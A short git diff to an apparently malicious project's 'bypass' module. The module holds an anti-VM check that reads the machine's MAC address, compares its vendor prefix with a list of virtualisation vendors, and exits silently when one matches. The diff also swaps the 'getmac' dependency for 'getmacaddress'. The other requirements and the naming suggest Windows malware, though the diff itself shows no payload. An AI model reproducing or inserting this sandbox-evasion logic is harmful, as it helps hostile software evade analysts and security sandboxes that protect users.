diff --git a/modules/bypass/anti_vm.py b/modules/bypass/anti_vm.py index 521d39f..3bf9d04 100644 --- a/modules/bypass/anti_vm.py +++ b/modules/bypass/anti_vm.py @@ -1,9 +1,9 @@ -import getmac,sys +import getmacaddress,sys def check(): vm_macs = ['080027','000569','000C29','001C14','005056','001C42','00163E','0A0027'] - mac = getmac.get_mac_address().split(':') + mac = getmacaddress.get_mac_address().split(':') mac = mac[0]+mac[1]+mac[2] mac = mac.upper() for macs in vm_macs: @@ -11,4 +11,4 @@ def check(): sys.exit(0) return True -check() \ No newline at end of file +check() diff --git a/requirements.txt b/requirements.txt index 01adbb4..63ed4d2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ -getmac +getmacaddress datetime pycryptodome Crypto pywin32 -requests \ No newline at end of file +requests